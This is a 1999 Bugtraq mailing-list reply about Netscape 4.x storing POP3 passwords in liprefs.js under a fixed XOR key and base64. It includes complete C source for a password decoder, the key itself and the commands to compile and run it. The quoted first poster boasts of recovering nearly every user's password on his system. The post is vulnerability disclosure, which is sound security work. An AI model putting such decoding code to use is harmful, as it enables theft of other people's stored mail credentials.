Bugtraq mailing list archives

Re: Netscape 4.5 vulnerability


From: wojtekka () BYDNET COM PL (Wojtek Kaniewski)
Date: Thu, 8 Apr 1999 23:35:58 +0200


Alexey Pavlov wrote:
> I found a method to get users' passwords from the Netscape 4.5 for
> FreeBSD ~user/.netscape/liprefs.js file. This file is used for
> storing the user's last session preferences. This file also contains
> the encrypted password for pop3.

This method was found months ago.

> Unlike DES, this encryption can be decrypted. As a result of
> many experiments I wrote this program. It gives me almost all
> passwords in my system, because all people use Netscape.
> Here is the src of this decryption program:
(snip)

Fascinating way to decrypt "xored" password :) Here's my little
decoder, that I wrote in April 1998 for Netscape 4.0x.

-----cut here-----
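/* (c) 1998 by wojtek kaniewski (wojtekka () dione ids pl) */

#include <stdio.h>

char base64[] = \
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* fixed XOR key; unsigned because several values are above 127 */
unsigned char key[] = \
  { 86, 201, 239, 74, 155, 190, 90, 66, 119, 2, 67, 24, 112, 48, 139,
    76, 176, 42, 214, 79, 149, 141, 250, 247, 87, 123, 152, 9, 67,
    93, 1, 10 };

int main(int argc, char **argv) {
  /* d = output byte being assembled, m = next bit position in d,
     i = index into key, c = 6-bit value of the current character */
  int d = 0, m = 7, b, c;
  unsigned int i = 0;
  char *p = (argc > 1) ? argv[1] : "";
  for (; *p && *p != '='; p++) {
    /* look up the 6-bit value of this base64 character */
    for (c = 0; c < 64 && *p != base64[c]; c++);
    if (c == 64) continue;  /* skip characters outside the alphabet */
    /* shift the six bits into d, most significant bit first */
    for (b = 5; b > -1; b--, m--) {
      d |= ((c & (1 << b)) >> b) << m;
      if (!m) {
        /* a full byte is ready; stop rather than read past the key */
        if (i >= sizeof(key)) { printf("\n"); return 1; }
        printf("%c", d ^ key[i++]);
        d = 0;
        m = 8;
      }
    }
  }
  printf("\n");
  return 0;
}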
-----cut here-----

$ gcc decode.c -o decode
$ ./decode <encrypted-password-here>

And no, it _won't_ get encrypted password from preferences file for you.

--
wojtekka () irc pl:: http://wojtekka.stone.pl/ :: ^wojtekka@irc


